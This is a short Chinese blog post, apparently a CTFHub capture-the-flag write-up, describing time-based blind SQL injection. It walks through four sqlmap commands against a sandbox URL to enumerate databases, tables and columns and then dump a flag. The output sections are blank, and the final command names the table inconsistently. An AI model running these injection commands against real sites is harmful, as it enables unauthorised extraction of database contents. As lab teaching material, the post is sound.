時間盲注
時間盲注代碼存在sql注入漏洞,然而頁面既不會回顯資料,也不會回顯錯誤資訊,陳述句執行后也不提示真偽,我們不能通過頁面的內容來判斷,這里我們可以通過構造陳述句,通過頁面回應的時長,來判斷資訊,這既是時間盲注,(博主不才,不會使用 Burp Suite代理工具,所以只能用sqlmap進行爆破)
一.爆破獲得資料庫
輸入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -dbs
結果:
(個人發現,時間盲注與布爾盲注不同的是上面多了一些東西,這可能是與布爾盲注的區別)獲得資料庫名
二.爆破獲得表名
輸入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -tables
結果:
獲得表名 flag、news
三.爆破獲得列名
輸入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"flag" -columns
結果:
爆破獲得其中的資料型別屬于varchar型
四.匯出資料
輸入:python sqlmap.py -u"http://challenge-5a10984ed9ef5c4f.sandbox.ctfhub.com:10080/?id=1" -batch -D"sqli" -T"tables" -C"flag" -dump
結果:
爆破獲得了flag,
若你對其中有些東西感到疑惑,可以去參考我的上一篇文章《布爾盲注之sqlmap爆破》,那一篇文章對許多東西有詳細的解釋,我也會盡快學會手工注入的,
轉載請註明出處,本文鏈接:https://www.uj5u.com/ruanti/252716.html
標籤:其他